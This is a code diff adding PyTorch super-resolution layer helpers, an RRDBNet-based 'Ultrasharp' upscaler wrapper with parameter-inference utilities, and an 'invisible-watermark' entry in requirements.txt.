+    x_view = x.view(b, c, h, scale, w, scale)
+    return x_view.permute(0, 1, 3, 5, 2, 4).reshape(b, out_channel, h, w)
+def pixelshuffle_block(
+    in_nc,
+    out_nc,
+    upscale_factor=2,
+    kernel_size=3,
+    stride=1,
+    bias=True,
+    pad_type="zero",
+    norm_type=None,
+    act_type="relu",
+    convtype="Conv2D",
+):
+    """
+    Pixel shuffle layer
+    (Real-Time Single Image and Video Super-Resolution Using an Efficient Sub-Pixel Convolutional
+    Neural Network, CVPR17)
+    """
+    conv = conv_block(
+        in_nc,
+        out_nc * (upscale_factor**2),
+        kernel_size,
+        stride,
+        bias=bias,
+        pad_type=pad_type,
+        norm_type=None,
+        act_type=None,
+        convtype=convtype,
+    )
+    pixel_shuffle = nn.PixelShuffle(upscale_factor)
+    n = norm(norm_type, out_nc) if norm_type else None
+    a = act(act_type) if act_type else None
+    return sequential(conv, pixel_shuffle, n, a)
+def upconv_block(
+    in_nc,
+    out_nc,
+    upscale_factor=2,
+    kernel_size=3,
+    stride=1,
+    bias=True,
+    pad_type="zero",
+    norm_type=None,
+    act_type="relu",
+    mode="nearest",
+    convtype="Conv2D",
+):
+    """Upconv layer"""
+    upscale_factor = (
+        (1, upscale_factor, upscale_factor) if convtype == "Conv3D" else upscale_factor
+    )
+    upsample = Upsample(scale_factor=upscale_factor, mode=mode)
+    conv = conv_block(
+        in_nc,
+        out_nc,
+        kernel_size,
+        stride,
+        bias=bias,
+        pad_type=pad_type,
+        norm_type=norm_type,
+        act_type=act_type,
+        convtype=convtype,
+    )
+    return sequential(upsample, conv)
+####################
+# Basic blocks
+####################
+def make_layer(basic_block, num_basic_block, **kwarg):
+    """Make layers by stacking the same blocks.
+    Args:
+        basic_block (nn.module): nn.module class for basic block. (block)
+        num_basic_block (int): number of blocks. (n_layers)
+    Returns:
+        nn.Sequential: Stacked blocks in nn.Sequential.
+    """
+    layers = []
+    for _ in range(num_basic_block):
+        layers.append(basic_block(**kwarg))
+    return nn.Sequential(*layers)
+def act(act_type, inplace=True, neg_slope=0.2, n_prelu=1, beta=1.0):
+    """activation helper"""
+    act_type = act_type.lower()
+    if act_type == "relu":
+        layer = nn.ReLU(inplace)
+    elif act_type in ("leakyrelu", "lrelu"):
+        layer = nn.LeakyReLU(neg_slope, inplace)
+    elif act_type == "prelu":
+        layer = nn.PReLU(num_parameters=n_prelu, init=neg_slope)
+    elif act_type == "tanh":  # [-1, 1] range output
+        layer = nn.Tanh()
+    elif act_type == "sigmoid":  # [0, 1] range output
+        layer = nn.Sigmoid()
+    else:
+        raise NotImplementedError(f"activation layer [{act_type}] is not found")
+    return layer
+class Identity(nn.Module):
+    def __init__(self, *kwargs):
+        super(Identity, self).__init__()
+    def forward(self, x, *kwargs):
+        return x
+def norm(norm_type, nc):
+    """Return a normalization layer"""
+    norm_type = norm_type.lower()
+    if norm_type == "batch":
+        layer = nn.BatchNorm2d(nc, affine=True)
+    elif norm_type == "instance":
+        layer = nn.InstanceNorm2d(nc, affine=False)
+    elif norm_type == "none":
+        def norm_layer(x):
+            return Identity()
+    else:
+        raise NotImplementedError(f"normalization layer [{norm_type}] is not found")
+    return layer
+def pad(pad_type, padding):
+    """padding layer helper"""
+    pad_type = pad_type.lower()
+    if padding == 0:
+        return None
+    if pad_type == "reflect":
+        layer = nn.ReflectionPad2d(padding)
+    elif pad_type == "replicate":
+        layer = nn.ReplicationPad2d(padding)
+    elif pad_type == "zero":
+        layer = nn.ZeroPad2d(padding)
+    else:
+        raise NotImplementedError(f"padding layer [{pad_type}] is not implemented")
+    return layer
+def get_valid_padding(kernel_size, dilation):
+    kernel_size = kernel_size + (kernel_size - 1) * (dilation - 1)
+    padding = (kernel_size - 1) // 2
+    return padding
+class ShortcutBlock(nn.Module):
+    """Elementwise sum the output of a submodule to its input"""
+    def __init__(self, submodule):
+        super(ShortcutBlock, self).__init__()
+        self.sub = submodule
+    def forward(self, x):
+        output = x + self.sub(x)
+        return output
+    def __repr__(self):
+        return "Identity + \n|" + self.sub.__repr__().replace("\n", "\n|")
+def sequential(*args):
+    """Flatten Sequential. It unwraps nn.Sequential."""
+    if len(args) == 1:
+        if isinstance(args[0], OrderedDict):
+            raise NotImplementedError("sequential does not support OrderedDict input.")
+        return args[0]  # No sequential is needed.
+    modules = []
+    for module in args:
+        if isinstance(module, nn.Sequential):
+            for submodule in module.children():
+                modules.append(submodule)
+        elif isinstance(module, nn.Module):
+            modules.append(module)
+    return nn.Sequential(*modules)
+def conv_block(
+    in_nc,
+    out_nc,
+    kernel_size,
+    stride=1,
+    dilation=1,
+    groups=1,
+    bias=True,
+    pad_type="zero",
+    norm_type=None,
+    act_type="relu",
+    mode="CNA",
+    convtype="Conv2D",
+    spectral_norm=False,
+):
+    """Conv layer with padding, normalization, activation"""
+    assert mode in ["CNA", "NAC", "CNAC"], f"Wrong conv mode [{mode}]"
+    padding = get_valid_padding(kernel_size, dilation)
+    p = pad(pad_type, padding) if pad_type and pad_type != "zero" else None
+    padding = padding if pad_type == "zero" else 0
+    if convtype == "PartialConv2D":
+        from torchvision.ops import (
+            PartialConv2d,
+        )  # this is definitely not going to work, but PartialConv2d doesn't work anyway and this shuts up static analyzer
+        c = PartialConv2d(
+            in_nc,
+            out_nc,
+            kernel_size=kernel_size,
+            stride=stride,
+            padding=padding,
+            dilation=dilation,
+            bias=bias,
+            groups=groups,
+        )
+    elif convtype == "DeformConv2D":
+        from torchvision.ops import DeformConv2d  # not tested
+        c = DeformConv2d(
+            in_nc,
+            out_nc,
+            kernel_size=kernel_size,
+            stride=stride,
+            padding=padding,
+            dilation=dilation,
+            bias=bias,
+            groups=groups,
+        )
+    elif convtype == "Conv3D":
+        c = nn.Conv3d(
+            in_nc,
+            out_nc,
+            kernel_size=kernel_size,
+            stride=stride,
+            padding=padding,
+            dilation=dilation,
+            bias=bias,
+            groups=groups,
+        )
+    else:
+        c = nn.Conv2d(
+            in_nc,
+            out_nc,
+            kernel_size=kernel_size,
+            stride=stride,
+            padding=padding,
+            dilation=dilation,
+            bias=bias,
+            groups=groups,
+        )
+    if spectral_norm:
+        c = nn.utils.spectral_norm(c)
+    a = act(act_type) if act_type else None
+    if "CNA" in mode:
+        n = norm(norm_type, out_nc) if norm_type else None
+        return sequential(p, c, n, a)
+    elif mode == "NAC":
+        if norm_type is None and act_type is not None:
+            a = act(act_type, inplace=False)
+        n = norm(norm_type, in_nc) if norm_type else None
+        return sequential(n, a, p, c)

models/ultrasharp/model.py ADDED Viewed

	@@ -0,0 +1,27 @@

+from typing import List
+import torch
+import models.ultrasharp.arch as arch
+from models.ultrasharp.util import infer_params, upscale_without_tiling
+class Ultrasharp:
+    def __init__(self, filename):
+        self.filename = filename
+    def enhance(self, img, outscale=4):
+        state_dict = torch.load(self.filename, map_location="cpu")
+        in_nc, out_nc, nf, nb, plus, mscale = infer_params(state_dict)
+        model = arch.RRDBNet(
+            in_nc=in_nc, out_nc=out_nc, nf=nf, nb=nb, upscale=mscale, plus=plus
+        )
+        model.load_state_dict(state_dict)
+        model.eval()
+        model.to("cuda")
+        img = upscale_without_tiling(model, img)
+        return img, None

models/ultrasharp/util.py ADDED Viewed

	@@ -0,0 +1,47 @@

+import numpy as np
+import torch
+def infer_params(state_dict):
+    # this code is copied from https://github.com/victorca25/iNNfer
+    scale2x = 0
+    scalemin = 6
+    n_uplayer = 0
+    plus = False
+    for block in list(state_dict):
+        parts = block.split(".")
+        n_parts = len(parts)
+        if n_parts == 5 and parts[2] == "sub":
+            nb = int(parts[3])
+        elif n_parts == 3:
+            part_num = int(parts[1])
+            if part_num > scalemin and parts[0] == "model" and parts[2] == "weight":
+                scale2x += 1
+            if part_num > n_uplayer:
+                n_uplayer = part_num
+                out_nc = state_dict[block].shape[0]
+        if not plus and "conv1x1" in block:
+            plus = True
+    nf = state_dict["model.0.weight"].shape[0]
+    in_nc = state_dict["model.0.weight"].shape[1]
+    out_nc = out_nc
+    scale = 2**scale2x
+    return in_nc, out_nc, nf, nb, plus, scale
+def upscale_without_tiling(model, img):
+    img = np.array(img)
+    img = img[:, :, ::-1]
+    img = np.ascontiguousarray(np.transpose(img, (2, 0, 1))) / 255
+    img = torch.from_numpy(img).float()
+    img = img.unsqueeze(0).to("cuda")
+    with torch.no_grad():
+        output = model(img)
+    output = output.squeeze().float().cpu().clamp_(0, 1).numpy()
+    output = 255.0 * np.moveaxis(output, 0, 2)
+    output = output.astype(np.uint8)
+    output = output[:, :, ::-1]
+    return output

requirements.txt CHANGED Viewed

@@ -35,6 +35,7 @@ webdataset==0.2.48
 https://comic-assets.s3.ap-south-1.amazonaws.com/packages/mmcv_full-1.7.0-cp39-cp39-linux_x86_64.whl
 python-dateutil==2.8.2
 PyYAML
 torchvision==0.15.2
 imgaug==0.4.0
 tqdm==4.64.1

 https://comic-assets.s3.ap-south-1.amazonaws.com/packages/mmcv_full-1.7.0-cp39-cp39-linux_x86_64.whl
 python-dateutil==2.8.2
 PyYAML
+invisible-watermark
 torchvision==0.15.2
 imgaug==0.4.0
 tqdm==4.64.1